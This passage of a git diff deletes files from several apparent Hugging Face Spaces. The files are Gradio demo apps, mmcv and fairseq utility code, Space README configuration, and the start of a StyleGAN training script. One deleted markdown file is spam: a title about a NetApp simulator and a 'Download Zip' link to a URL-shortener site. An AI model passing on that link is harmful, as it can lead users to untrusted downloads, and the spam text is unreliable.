a/spaces/furqankassa/flair-ner-english-ontonotes-large/app.py b/spaces/furqankassa/flair-ner-english-ontonotes-large/app.py deleted file mode 100644 index 
1db6b1d08dca41d827632377764e2e5407c0c88d..0000000000000000000000000000000000000000 --- a/spaces/furqankassa/flair-ner-english-ontonotes-large/app.py +++ /dev/null @@ -1,3 +0,0 @@ -import gradio as gr - -gr.Interface.load("models/flair/ner-english-ontonotes-large").launch() \ No newline at end of file diff --git a/spaces/generativeai/bestpics-ms-image-similarity/app.py b/spaces/generativeai/bestpics-ms-image-similarity/app.py deleted file mode 100644 index 2ebca92f9639c9e0b84139bc1a050754498bd915..0000000000000000000000000000000000000000 --- a/spaces/generativeai/bestpics-ms-image-similarity/app.py +++ /dev/null @@ -1,28 +0,0 @@ -import os -import gradio as gr -from image_similarity import ImageSimilarity -from services.aws_service import AwsService -from dotenv import load_dotenv - -load_dotenv() - -def check_image_similarity(photo_shoot_id): - folder = "PhotoShoots/" + str(photo_shoot_id) + "/Croppeds" - files = AwsService.get_files_from_s3(os.environ.get('AWS_S3_BUCKET'), folder) - - images = [] - for file in files: - images.append(AwsService.get_image_from_s3(os.environ.get('AWS_S3_BUCKET'), file['Key'])) - - if len(images) == 0: - return [] - - return ImageSimilarity(1).check(images) - -iface = gr.Interface( - fn=check_image_similarity, - inputs=[gr.Textbox(lines=1, placeholder="Photo Shoot ID")], - outputs="text" -) - -iface.launch() \ No newline at end of file diff --git a/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/mmcv/utils/parrots_wrapper.py b/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/mmcv/utils/parrots_wrapper.py deleted file mode 100644 index 93c97640d4b9ed088ca82cfe03e6efebfcfa9dbf..0000000000000000000000000000000000000000 --- a/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/mmcv/utils/parrots_wrapper.py +++ /dev/null @@ -1,107 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. 
-from functools import partial - -import torch - -TORCH_VERSION = torch.__version__ - - -def is_rocm_pytorch() -> bool: - is_rocm = False - if TORCH_VERSION != 'parrots': - try: - from torch.utils.cpp_extension import ROCM_HOME - is_rocm = True if ((torch.version.hip is not None) and - (ROCM_HOME is not None)) else False - except ImportError: - pass - return is_rocm - - -def _get_cuda_home(): - if TORCH_VERSION == 'parrots': - from parrots.utils.build_extension import CUDA_HOME - else: - if is_rocm_pytorch(): - from torch.utils.cpp_extension import ROCM_HOME - CUDA_HOME = ROCM_HOME - else: - from torch.utils.cpp_extension import CUDA_HOME - return CUDA_HOME - - -def get_build_config(): - if TORCH_VERSION == 'parrots': - from parrots.config import get_build_info - return get_build_info() - else: - return torch.__config__.show() - - -def _get_conv(): - if TORCH_VERSION == 'parrots': - from parrots.nn.modules.conv import _ConvNd, _ConvTransposeMixin - else: - from torch.nn.modules.conv import _ConvNd, _ConvTransposeMixin - return _ConvNd, _ConvTransposeMixin - - -def _get_dataloader(): - if TORCH_VERSION == 'parrots': - from torch.utils.data import DataLoader, PoolDataLoader - else: - from torch.utils.data import DataLoader - PoolDataLoader = DataLoader - return DataLoader, PoolDataLoader - - -def _get_extension(): - if TORCH_VERSION == 'parrots': - from parrots.utils.build_extension import BuildExtension, Extension - CppExtension = partial(Extension, cuda=False) - CUDAExtension = partial(Extension, cuda=True) - else: - from torch.utils.cpp_extension import (BuildExtension, CppExtension, - CUDAExtension) - return BuildExtension, CppExtension, CUDAExtension - - -def _get_pool(): - if TORCH_VERSION == 'parrots': - from parrots.nn.modules.pool import (_AdaptiveAvgPoolNd, - _AdaptiveMaxPoolNd, _AvgPoolNd, - _MaxPoolNd) - else: - from torch.nn.modules.pooling import (_AdaptiveAvgPoolNd, - _AdaptiveMaxPoolNd, _AvgPoolNd, - _MaxPoolNd) - return _AdaptiveAvgPoolNd, _AdaptiveMaxPoolNd, _AvgPoolNd, _MaxPoolNd - - -def _get_norm(): - if TORCH_VERSION == 'parrots': - from parrots.nn.modules.batchnorm import _BatchNorm, _InstanceNorm - SyncBatchNorm_ = torch.nn.SyncBatchNorm2d - else: - from torch.nn.modules.instancenorm import _InstanceNorm - from torch.nn.modules.batchnorm import _BatchNorm - SyncBatchNorm_ = torch.nn.SyncBatchNorm - return _BatchNorm, _InstanceNorm, SyncBatchNorm_ - - -_ConvNd, _ConvTransposeMixin = _get_conv() -DataLoader, PoolDataLoader = _get_dataloader() -BuildExtension, CppExtension, CUDAExtension = _get_extension() -_BatchNorm, _InstanceNorm, SyncBatchNorm_ = _get_norm() -_AdaptiveAvgPoolNd, _AdaptiveMaxPoolNd, _AvgPoolNd, _MaxPoolNd = _get_pool() - - -class SyncBatchNorm(SyncBatchNorm_): - - def _check_input_dim(self, input): - if TORCH_VERSION == 'parrots': - if input.dim() < 2: - raise ValueError( - f'expected at least 2D input (got {input.dim()}D input)') - else: - super()._check_input_dim(input) diff --git a/spaces/ghlee94/MEDIAR/segmentation_models_pytorch/decoders/pan/__init__.py b/spaces/ghlee94/MEDIAR/segmentation_models_pytorch/decoders/pan/__init__.py deleted file mode 100644 index 46327c35a041683dd24b6522ff75a4ac9559d60b..0000000000000000000000000000000000000000 --- a/spaces/ghlee94/MEDIAR/segmentation_models_pytorch/decoders/pan/__init__.py +++ /dev/null @@ -1 +0,0 @@ -from .model import PAN diff --git a/spaces/gordonchan/h2oo/README.md b/spaces/gordonchan/h2oo/README.md deleted file mode 100644 index 
185a57f8cfa251bf44e42b6713e8a47459120efb..0000000000000000000000000000000000000000 --- a/spaces/gordonchan/h2oo/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: H2ogpt Chatbot -emoji: 📚 -colorFrom: yellow -colorTo: yellow -sdk: gradio -sdk_version: 3.35.2 -app_file: gen.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/gotiQspiryo/whisper-ui/examples/How to Use NetApp Data ONTAP Simulator 8 1.19 for Clustered Data ONTAP Testing.md b/spaces/gotiQspiryo/whisper-ui/examples/How to Use NetApp Data ONTAP Simulator 8 1.19 for Clustered Data ONTAP Testing.md deleted file mode 100644 index e37f872e38d23d8cf53c3a76d29f9bab1479724b..0000000000000000000000000000000000000000 --- a/spaces/gotiQspiryo/whisper-ui/examples/How to Use NetApp Data ONTAP Simulator 8 1.19 for Clustered Data ONTAP Testing.md +++ /dev/null @@ -1,5 +0,0 @@ - -


          -

          netapp data ontap simulator 8 1.19


          Download Zip https://urlgoal.com/2uyM4r



          aaccfb2cb3
          -
          -
          \ No newline at end of file diff --git a/spaces/gradio/HuBERT/fairseq/data/pad_dataset.py b/spaces/gradio/HuBERT/fairseq/data/pad_dataset.py deleted file mode 100644 index 8075bba6a9efc5f8421368ee0b2ae66afe3f5009..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/fairseq/data/pad_dataset.py +++ /dev/null @@ -1,28 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from fairseq.data import data_utils - -from . import BaseWrapperDataset - - -class PadDataset(BaseWrapperDataset): - def __init__(self, dataset, pad_idx, left_pad): - super().__init__(dataset) - self.pad_idx = pad_idx - self.left_pad = left_pad - - def collater(self, samples): - return data_utils.collate_tokens(samples, self.pad_idx, left_pad=self.left_pad) - - -class LeftPadDataset(PadDataset): - def __init__(self, dataset, pad_idx): - super().__init__(dataset, pad_idx, left_pad=True) - - -class RightPadDataset(PadDataset): - def __init__(self, dataset, pad_idx): - super().__init__(dataset, pad_idx, left_pad=False) diff --git a/spaces/gradio/HuBERT/fairseq/tasks/fairseq_task.py b/spaces/gradio/HuBERT/fairseq/tasks/fairseq_task.py deleted file mode 100644 index fbec9bb2a557e97cb921b705846bde482d85f169..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/fairseq/tasks/fairseq_task.py +++ /dev/null @@ -1,677 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import logging -import os -import warnings -from argparse import Namespace -from typing import Any, Callable, Dict, List - -import torch -from fairseq import metrics, search, tokenizer, utils -from fairseq.data import Dictionary, FairseqDataset, data_utils, encoders, iterators -from fairseq.dataclass import FairseqDataclass -from fairseq.dataclass.utils import gen_parser_from_dataclass -from fairseq.optim.amp_optimizer import AMPOptimizer -from omegaconf import DictConfig - - -logger = logging.getLogger(__name__) - - -class StatefulContainer(object): - - _state: Dict[str, Any] = dict() - _factories: Dict[str, Callable[[], Any]] = dict() - - def add_factory(self, name, factory: Callable[[], Any]): - self._factories[name] = factory - - def merge_state_dict(self, state_dict: Dict[str, Any]): - self._state.update(state_dict) - - @property - def state_dict(self) -> Dict[str, Any]: - return self._state - - def __getattr__(self, name): - if name not in self._state and name in self._factories: - self._state[name] = self._factories[name]() - - if name in self._state: - return self._state[name] - - raise AttributeError(f"Task state has no factory for attribute {name}") - - -class FairseqTask(object): - """ - Tasks store dictionaries and provide helpers for loading/iterating over - Datasets, initializing the Model/Criterion and calculating the loss. - - Tasks have limited statefulness. In particular, state that needs to be - saved to/loaded from checkpoints needs to be stored in the `self.state` - :class:`StatefulContainer` object. For example:: - - self.state.add_factory("dictionary", self.load_dictionary) - print(self.state.dictionary) # calls self.load_dictionary() - - This is necessary so that when loading checkpoints, we can properly - recreate the task state after initializing the task instance. 
- """ - - @classmethod - def add_args(cls, parser): - """Add task-specific arguments to the parser.""" - dc = getattr(cls, "__dataclass", None) - if dc is not None: - gen_parser_from_dataclass(parser, dc()) - - @staticmethod - def logging_outputs_can_be_summed(criterion) -> bool: - """ - Whether the logging outputs returned by `train_step` and `valid_step` can - be summed across workers prior to calling `aggregate_logging_outputs`. - Setting this to True will improves distributed training speed. - """ - return criterion.logging_outputs_can_be_summed() - - cfg: FairseqDataclass - datasets: Dict[str, FairseqDataset] - dataset_to_epoch_iter: Dict[FairseqDataset, Any] - state: StatefulContainer = None - - def __init__(self, cfg: FairseqDataclass, **kwargs): - self.cfg = cfg - self.datasets = dict() - self.dataset_to_epoch_iter = dict() - self.state = StatefulContainer() - - @classmethod - def load_dictionary(cls, filename): - """Load the dictionary from the filename - - Args: - filename (str): the filename - """ - return Dictionary.load(filename) - - @classmethod - def build_dictionary( - cls, filenames, workers=1, threshold=-1, nwords=-1, padding_factor=8 - ): - """Build the dictionary - - Args: - filenames (list): list of filenames - workers (int): number of concurrent workers - threshold (int): defines the minimum word count - nwords (int): defines the total number of words in the final dictionary, - including special symbols - padding_factor (int): can be used to pad the dictionary size to be a - multiple of 8, which is important on some hardware (e.g., Nvidia - Tensor Cores). - """ - d = Dictionary() - for filename in filenames: - Dictionary.add_file_to_dictionary( - filename, d, tokenizer.tokenize_line, workers - ) - d.finalize(threshold=threshold, nwords=nwords, padding_factor=padding_factor) - return d - - @classmethod - def setup_task(cls, cfg: DictConfig, **kwargs): - """Setup the task (e.g., load dictionaries). - - Args: - cfg (omegaconf.DictConfig): parsed command-line arguments - """ - return cls(cfg, **kwargs) - - def has_sharded_data(self, split): - return os.pathsep in getattr(self.cfg, "data", "") - - def load_dataset( - self, - split: str, - combine: bool = False, - task_cfg: FairseqDataclass = None, - **kwargs - ): - """Load a given dataset split. - - Args: - split (str): name of the split (e.g., train, valid, test) - combine (bool): combines a split segmented into pieces into one dataset - task_cfg (FairseqDataclass): optional task configuration stored in the checkpoint that can be used - to load datasets - """ - raise NotImplementedError - - def dataset(self, split): - """ - Return a loaded dataset split. - - Args: - split (str): name of the split (e.g., train, valid, test) - - Returns: - a :class:`~fairseq.data.FairseqDataset` corresponding to *split* - """ - from fairseq.data import FairseqDataset - - if split not in self.datasets: - raise KeyError("Dataset not loaded: " + split) - if not isinstance(self.datasets[split], FairseqDataset): - raise TypeError("Datasets are expected to be of type FairseqDataset") - return self.datasets[split] - - def filter_indices_by_size( - self, indices, dataset, max_positions=None, ignore_invalid_inputs=False - ): - """ - Filter examples that are too large - - Args: - indices (np.array): original array of sample indices - dataset (~fairseq.data.FairseqDataset): dataset to batch - max_positions (optional): max sentence length supported by the - model (default: None). 
- ignore_invalid_inputs (bool, optional): don't raise Exception for - sentences that are too long (default: False). - Returns: - np.array: array of filtered sample indices - """ - indices, ignored = dataset.filter_indices_by_size(indices, max_positions) - if len(ignored) > 0: - if not ignore_invalid_inputs: - raise Exception( - ( - "Size of sample #{} is invalid (={}) since max_positions={}, " - "skip this example with --skip-invalid-size-inputs-valid-test" - ).format(ignored[0], dataset.size(ignored[0]), max_positions) - ) - logger.warning( - ( - "{:,} samples have invalid sizes and will be skipped, " - "max_positions={}, first few sample ids={}" - ).format(len(ignored), max_positions, ignored[:10]) - ) - return indices - - def can_reuse_epoch_itr(self, dataset): - # We can reuse the epoch iterator across epochs as long as the dataset - # hasn't disabled it. We default to ``False`` here, although in practice - # this will be ``True`` for most datasets that inherit from - # ``FairseqDataset`` due to the base implementation there. - return getattr(dataset, "can_reuse_epoch_itr_across_epochs", False) - - def get_batch_iterator( - self, - dataset, - max_tokens=None, - max_sentences=None, - max_positions=None, - ignore_invalid_inputs=False, - required_batch_size_multiple=1, - seed=1, - num_shards=1, - shard_id=0, - num_workers=0, - epoch=1, - data_buffer_size=0, - disable_iterator_cache=False, - ): - """ - Get an iterator that yields batches of data from the given dataset. - - Args: - dataset (~fairseq.data.FairseqDataset): dataset to batch - max_tokens (int, optional): max number of tokens in each batch - (default: None). - max_sentences (int, optional): max number of sentences in each - batch (default: None). - max_positions (optional): max sentence length supported by the - model (default: None). - ignore_invalid_inputs (bool, optional): don't raise Exception for - sentences that are too long (default: False). - required_batch_size_multiple (int, optional): require batch size to - be a multiple of N (default: 1). - seed (int, optional): seed for random number generator for - reproducibility (default: 1). - num_shards (int, optional): shard the data iterator into N - shards (default: 1). - shard_id (int, optional): which shard of the data iterator to - return (default: 0). - num_workers (int, optional): how many subprocesses to use for data - loading. 0 means the data will be loaded in the main process - (default: 0). - epoch (int, optional): the epoch to start the iterator from - (default: 1). - data_buffer_size (int, optional): number of batches to - preload (default: 0). - disable_iterator_cache (bool, optional): don't cache the - EpochBatchIterator (ignores `FairseqTask::can_reuse_epoch_itr`) - (default: False). 
- Returns: - ~fairseq.iterators.EpochBatchIterator: a batched iterator over the - given dataset split - """ - can_reuse_epoch_itr = not disable_iterator_cache and self.can_reuse_epoch_itr( - dataset - ) - if can_reuse_epoch_itr and dataset in self.dataset_to_epoch_iter: - logger.debug("reusing EpochBatchIterator for epoch {}".format(epoch)) - return self.dataset_to_epoch_iter[dataset] - - assert isinstance(dataset, FairseqDataset) - - # initialize the dataset with the correct starting epoch - dataset.set_epoch(epoch) - - # get indices ordered by example size - with data_utils.numpy_seed(seed): - indices = dataset.ordered_indices() - - # filter examples that are too large - if max_positions is not None: - indices = self.filter_indices_by_size( - indices, dataset, max_positions, ignore_invalid_inputs - ) - - # create mini-batches with given size constraints - batch_sampler = dataset.batch_by_size( - indices, - max_tokens=max_tokens, - max_sentences=max_sentences, - required_batch_size_multiple=required_batch_size_multiple, - ) - - # return a reusable, sharded iterator - epoch_iter = iterators.EpochBatchIterator( - dataset=dataset, - collate_fn=dataset.collater, - batch_sampler=batch_sampler, - seed=seed, - num_shards=num_shards, - shard_id=shard_id, - num_workers=num_workers, - epoch=epoch, - buffer_size=data_buffer_size, - ) - - if can_reuse_epoch_itr: - self.dataset_to_epoch_iter[dataset] = epoch_iter - - return epoch_iter - - def build_model(self, cfg: FairseqDataclass): - """ - Build the :class:`~fairseq.models.BaseFairseqModel` instance for this - task. - - Args: - cfg (FairseqDataclass): configuration object - - Returns: - a :class:`~fairseq.models.BaseFairseqModel` instance - """ - from fairseq import models, quantization_utils - - model = models.build_model(cfg, self) - model = quantization_utils.quantize_model_scalar(model, cfg) - return model - - def build_criterion(self, cfg: DictConfig): - """ - Build the :class:`~fairseq.criterions.FairseqCriterion` instance for - this task. - - Args: - cfg (omegaconf.DictConfig): configration object - - Returns: - a :class:`~fairseq.criterions.FairseqCriterion` instance - """ - from fairseq import criterions - - return criterions.build_criterion(cfg, self) - - def build_generator( - self, models, args, seq_gen_cls=None, extra_gen_cls_kwargs=None, prefix_allowed_tokens_fn=None, - ): - """ - Build a :class:`~fairseq.SequenceGenerator` instance for this - task. - - Args: - models (List[~fairseq.models.FairseqModel]): ensemble of models - args (fairseq.dataclass.configs.GenerationConfig): - configuration object (dataclass) for generation - extra_gen_cls_kwargs (Dict[str, Any]): extra options to pass - through to SequenceGenerator - prefix_allowed_tokens_fn (Callable[[int, torch.Tensor], List[int]]): - If provided, this function constrains the beam search to - allowed tokens only at each step. The provided function - should take 2 arguments: the batch ID (`batch_id: int`) - and a unidimensional tensor of token ids (`inputs_ids: - torch.Tensor`). It has to return a `List[int]` with the - allowed tokens for the next generation step conditioned - on the previously generated tokens (`inputs_ids`) and - the batch ID (`batch_id`). This argument is useful for - constrained generation conditioned on the prefix, as - described in "Autoregressive Entity Retrieval" - (https://arxiv.org/abs/2010.00904) and - https://github.com/facebookresearch/GENRE. 
- """ - if getattr(args, "score_reference", False): - from fairseq.sequence_scorer import SequenceScorer - - return SequenceScorer( - self.target_dictionary, - compute_alignment=getattr(args, "print_alignment", False), - ) - - from fairseq.sequence_generator import ( - SequenceGenerator, - SequenceGeneratorWithAlignment, - ) - try: - from fairseq.fb_sequence_generator import FBSequenceGenerator - except ModuleNotFoundError: - pass - - # Choose search strategy. Defaults to Beam Search. - sampling = getattr(args, "sampling", False) - sampling_topk = getattr(args, "sampling_topk", -1) - sampling_topp = getattr(args, "sampling_topp", -1.0) - diverse_beam_groups = getattr(args, "diverse_beam_groups", -1) - diverse_beam_strength = getattr(args, "diverse_beam_strength", 0.5) - match_source_len = getattr(args, "match_source_len", False) - diversity_rate = getattr(args, "diversity_rate", -1) - constrained = getattr(args, "constraints", False) - if prefix_allowed_tokens_fn is None: - prefix_allowed_tokens_fn = getattr(args, "prefix_allowed_tokens_fn", None) - if ( - sum( - int(cond) - for cond in [ - sampling, - diverse_beam_groups > 0, - match_source_len, - diversity_rate > 0, - ] - ) - > 1 - ): - raise ValueError("Provided Search parameters are mutually exclusive.") - assert sampling_topk < 0 or sampling, "--sampling-topk requires --sampling" - assert sampling_topp < 0 or sampling, "--sampling-topp requires --sampling" - - if sampling: - search_strategy = search.Sampling( - self.target_dictionary, sampling_topk, sampling_topp - ) - elif diverse_beam_groups > 0: - search_strategy = search.DiverseBeamSearch( - self.target_dictionary, diverse_beam_groups, diverse_beam_strength - ) - elif match_source_len: - # this is useful for tagging applications where the output - # length should match the input length, so we hardcode the - # length constraints for simplicity - search_strategy = search.LengthConstrainedBeamSearch( - self.target_dictionary, - min_len_a=1, - min_len_b=0, - max_len_a=1, - max_len_b=0, - ) - elif diversity_rate > -1: - search_strategy = search.DiverseSiblingsSearch( - self.target_dictionary, diversity_rate - ) - elif constrained: - search_strategy = search.LexicallyConstrainedBeamSearch( - self.target_dictionary, args.constraints - ) - elif prefix_allowed_tokens_fn: - search_strategy = search.PrefixConstrainedBeamSearch( - self.target_dictionary, prefix_allowed_tokens_fn - ) - else: - search_strategy = search.BeamSearch(self.target_dictionary) - - extra_gen_cls_kwargs = extra_gen_cls_kwargs or {} - if seq_gen_cls is None: - if getattr(args, "print_alignment", False): - seq_gen_cls = SequenceGeneratorWithAlignment - extra_gen_cls_kwargs["print_alignment"] = args.print_alignment - elif getattr(args, "fb_seq_gen", False): - seq_gen_cls = FBSequenceGenerator - else: - seq_gen_cls = SequenceGenerator - - return seq_gen_cls( - models, - self.target_dictionary, - beam_size=getattr(args, "beam", 5), - max_len_a=getattr(args, "max_len_a", 0), - max_len_b=getattr(args, "max_len_b", 200), - min_len=getattr(args, "min_len", 1), - normalize_scores=(not getattr(args, "unnormalized", False)), - len_penalty=getattr(args, "lenpen", 1), - unk_penalty=getattr(args, "unkpen", 0), - temperature=getattr(args, "temperature", 1.0), - match_source_len=getattr(args, "match_source_len", False), - no_repeat_ngram_size=getattr(args, "no_repeat_ngram_size", 0), - search_strategy=search_strategy, - **extra_gen_cls_kwargs, - ) - - def train_step( - self, sample, model, criterion, optimizer, update_num, 
ignore_grad=False - ): - """ - Do forward and backward, and return the loss as computed by *criterion* - for the given *model* and *sample*. - - Args: - sample (dict): the mini-batch. The format is defined by the - :class:`~fairseq.data.FairseqDataset`. - model (~fairseq.models.BaseFairseqModel): the model - criterion (~fairseq.criterions.FairseqCriterion): the criterion - optimizer (~fairseq.optim.FairseqOptimizer): the optimizer - update_num (int): the current update - ignore_grad (bool): multiply loss by 0 if this is set to True - - Returns: - tuple: - - the loss - - the sample size, which is used as the denominator for the - gradient - - logging outputs to display while training - """ - model.train() - model.set_num_updates(update_num) - with torch.autograd.profiler.record_function("forward"): - with torch.cuda.amp.autocast(enabled=(isinstance(optimizer, AMPOptimizer))): - loss, sample_size, logging_output = criterion(model, sample) - if ignore_grad: - loss *= 0 - with torch.autograd.profiler.record_function("backward"): - optimizer.backward(loss) - return loss, sample_size, logging_output - - def valid_step(self, sample, model, criterion): - model.eval() - with torch.no_grad(): - loss, sample_size, logging_output = criterion(model, sample) - return loss, sample_size, logging_output - - def optimizer_step(self, optimizer, model, update_num): - optimizer.step() - - def build_dataset_for_inference( - self, src_tokens: List[torch.Tensor], src_lengths: List[int], **kwargs - ) -> torch.utils.data.Dataset: - raise NotImplementedError - - def inference_step( - self, generator, models, sample, prefix_tokens=None, constraints=None - ): - with torch.no_grad(): - return generator.generate( - models, sample, prefix_tokens=prefix_tokens, constraints=constraints - ) - - def begin_epoch(self, epoch, model): - """Hook function called before the start of each epoch.""" - pass - - def begin_valid_epoch(self, epoch, model): - """Hook function called before the start of each validation epoch.""" - pass - - def aggregate_logging_outputs(self, logging_outputs, criterion): - """[deprecated] Aggregate logging outputs from data parallel training.""" - utils.deprecation_warning( - "The aggregate_logging_outputs API is deprecated. " - "Please use the reduce_metrics API instead." - ) - with metrics.aggregate() as agg: - self.reduce_metrics(logging_outputs, criterion) - return agg.get_smoothed_values() - - def reduce_metrics(self, logging_outputs, criterion): - """Aggregate logging outputs from data parallel training.""" - # backward compatibility for tasks that override aggregate_logging_outputs - base_func = FairseqTask.aggregate_logging_outputs - self_func = getattr(self, "aggregate_logging_outputs").__func__ - if self_func is not base_func: - utils.deprecation_warning( - "Tasks should implement the reduce_metrics API. " - "Falling back to deprecated aggregate_logging_outputs API." 
- ) - agg_logging_outputs = self.aggregate_logging_outputs( - logging_outputs, criterion - ) - for k, v in agg_logging_outputs.items(): - metrics.log_scalar(k, v) - return - - if not any("ntokens" in log for log in logging_outputs): - warnings.warn( - "ntokens not found in Criterion logging outputs, cannot log wpb or wps" - ) - else: - ntokens = sum(log.get("ntokens", 0) for log in logging_outputs) - metrics.log_scalar("wpb", ntokens, priority=180, round=1) - metrics.log_speed("wps", ntokens, priority=90, round=1) - - if not any("nsentences" in log for log in logging_outputs): - warnings.warn( - "nsentences not found in Criterion logging outputs, cannot log bsz" - ) - else: - nsentences = sum(log.get("nsentences", 0) for log in logging_outputs) - metrics.log_scalar("bsz", nsentences, priority=190, round=1) - - criterion.__class__.reduce_metrics(logging_outputs) - - def state_dict(self): - if self.state is not None: - return self.state.state_dict - return {} - - def load_state_dict(self, state_dict: Dict[str, Any]): - if self.state is not None: - self.state.merge_state_dict(state_dict) - - def max_positions(self): - """Return the max input length allowed by the task.""" - return None - - @property - def source_dictionary(self): - """Return the source :class:`~fairseq.data.Dictionary` (if applicable - for this task).""" - raise NotImplementedError - - @property - def target_dictionary(self): - """Return the target :class:`~fairseq.data.Dictionary` (if applicable - for this task).""" - raise NotImplementedError - - def build_tokenizer(self, args): - """Build the pre-tokenizer for this task.""" - return encoders.build_tokenizer(args) - - def build_bpe(self, args): - """Build the tokenizer for this task.""" - return encoders.build_bpe(args) - - def get_interactive_tokens_and_lengths(self, lines, encode_fn): - tokens = [ - self.source_dictionary.encode_line( - encode_fn(src_str), add_if_not_exist=False - ).long() - for src_str in lines - ] - lengths = [t.numel() for t in tokens] - return tokens, lengths - - -class LegacyFairseqTask(FairseqTask): - def __init__(self, args: Namespace): - self.args = args - self.datasets = {} - self.dataset_to_epoch_iter = {} - - @classmethod - def setup_task(cls, args: Namespace, **kwargs): - """Setup the task (e.g., load dictionaries). - - Args: - args (argparse.Namespace): parsed command-line arguments - """ - return cls(args, **kwargs) - - def has_sharded_data(self, split): - return os.pathsep in getattr(self.args, "data", "") - - def build_model(self, args: Namespace): - """ - Build the :class:`~fairseq.models.BaseFairseqModel` instance for this - task. - - Args: - args (argparse.Namespace): parsed command-line arguments - - Returns: - a :class:`~fairseq.models.BaseFairseqModel` instance - """ - from fairseq import models, quantization_utils - - model = models.build_model(args, self) - model = quantization_utils.quantize_model_scalar(model, args) - return model - - def build_criterion(self, args: Namespace): - """ - Build the :class:`~fairseq.criterions.FairseqCriterion` instance for - this task. 
- - Args: - args (argparse.Namespace): parsed command-line arguments - - Returns: - a :class:`~fairseq.criterions.FairseqCriterion` instance - """ - from fairseq import criterions - - return criterions.build_criterion(args, self) diff --git a/spaces/gyugnsu/DragGan-Inversion/stylegan_human/training_scripts/sg2/train.py b/spaces/gyugnsu/DragGan-Inversion/stylegan_human/training_scripts/sg2/train.py deleted file mode 100644 index 74d016a65caedb70806c490b6ebbcad665de51b9..0000000000000000000000000000000000000000 --- a/spaces/gyugnsu/DragGan-Inversion/stylegan_human/training_scripts/sg2/train.py +++ /dev/null @@ -1,589 +0,0 @@ -# Copyright (c) SenseTime Research. All rights reserved. - -# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Train a GAN using the techniques described in the paper -"Training Generative Adversarial Networks with Limited Data".""" - -import os -import click -import re -import json -import tempfile -import torch -import dnnlib - -import ast -from training import training_loop -from metrics import metric_main -from torch_utils import training_stats -from torch_utils import custom_ops - -# ---------------------------------------------------------------------------- - - -class UserError(Exception): - pass - -# ---------------------------------------------------------------------------- - - -def setup_training_loop_kwargs( - # General options (not included in desc). - gpus=None, # Number of GPUs: , default = 1 gpu - snap=None, # Snapshot interval: , default = 50 ticks - metrics=None, # List of metric names: [], ['fid50k_full'] (default), ... - seed=None, # Random seed: , default = 0 - - # Dataset. - data=None, # Training dataset (required): - cond=None, # Train conditional model based on dataset labels: , default = False - subset=None, # Train with only N images: , default = all - mirror=None, # Augment dataset with x-flips: , default = False - square=None, - - # Base config. - # Base config: 'auto' (default), 'stylegan2', 'paper256', 'paper512', 'paper1024', 'cifar', 'shhq' - cfg=None, - gamma=None, # Override R1 gamma: - kimg=None, # Override training duration: - batch=None, # Override batch size: - - # Discriminator augmentation. - aug=None, # Augmentation mode: 'ada' (default), 'noaug', 'fixed' - p=None, # Specify p for 'fixed' (required): - target=None, # Override ADA target for 'ada': , default = depends on aug - # Augmentation pipeline: 'blit', 'geom', 'color', 'filter', 'noise', 'cutout', 'bg', 'bgc' (default), ..., 'bgcfnc' - augpipe=None, - - # Transfer learning. - # Load previous network: 'noresume' (default), 'ffhq256', 'ffhq512', 'ffhq1024', 'celebahq256', 'lsundog256', , - resume=None, - freezed=None, # Freeze-D: , default = 0 discriminator layers - - # Performance options (not included in desc). 
- fp32=None, # Disable mixed-precision training: , default = False - nhwc=None, # Use NHWC memory format with FP16: , default = False - # Allow PyTorch to use TF32 for matmul and convolutions: , default = False - allow_tf32=None, - nobench=None, # Disable cuDNN benchmarking: , default = False - workers=None, # Override number of DataLoader workers: , default = 3 - -): - args = dnnlib.EasyDict() - - # ------------------------------------------ - # General options: gpus, snap, metrics, seed - # ------------------------------------------ - - if gpus is None: - gpus = 1 - assert isinstance(gpus, int) - if not (gpus >= 1 and gpus & (gpus - 1) == 0): - raise UserError('--gpus must be a power of two') - args.num_gpus = gpus - - if snap is None: - snap = 50 - assert isinstance(snap, int) - if snap < 1: - raise UserError('--snap must be at least 1') - args.image_snapshot_ticks = snap - args.network_snapshot_ticks = snap - - if metrics is None: - metrics = ['fid50k_full'] - assert isinstance(metrics, list) - if not all(metric_main.is_valid_metric(metric) for metric in metrics): - raise UserError('\n'.join( - ['--metrics can only contain the following values:'] + metric_main.list_valid_metrics())) - args.metrics = metrics - - if seed is None: - seed = 0 - assert isinstance(seed, int) - args.random_seed = seed - - # ------------------------------------------- - # Dataset: data, cond, subset, mirror, square - # ------------------------------------------- - - print('square : ', square) - - assert data is not None - assert isinstance(data, str) - - args.training_set_kwargs = dnnlib.EasyDict( - class_name='training.dataset.ImageFolderDataset', path=data, use_labels=True, max_size=None, xflip=False, square=square) - args.data_loader_kwargs = dnnlib.EasyDict( - pin_memory=True, num_workers=3, prefetch_factor=2) - try: - training_set = dnnlib.util.construct_class_by_name( - **args.training_set_kwargs) # subclass of training.dataset.Dataset - # be explicit about resolution - args.training_set_kwargs.resolution = training_set.resolution - # be explicit about labels - args.training_set_kwargs.use_labels = training_set.has_labels - args.training_set_kwargs.max_size = len( - training_set) # be explicit about dataset size - desc = training_set.name - print('desc: ', desc) - del training_set # conserve memory - except IOError as err: - raise UserError(f'--data: {err}') - - if square: - desc += '-square' - else: - desc += '-rectangle' - - if cond is None: - cond = False - assert isinstance(cond, bool) - if cond: - if not args.training_set_kwargs.use_labels: - raise UserError( - '--cond=True requires labels specified in dataset.json') - desc += '-cond' - else: - args.training_set_kwargs.use_labels = False - - if subset is not None: - assert isinstance(subset, int) - if not 1 <= subset <= args.training_set_kwargs.max_size: - raise UserError( - f'--subset must be between 1 and 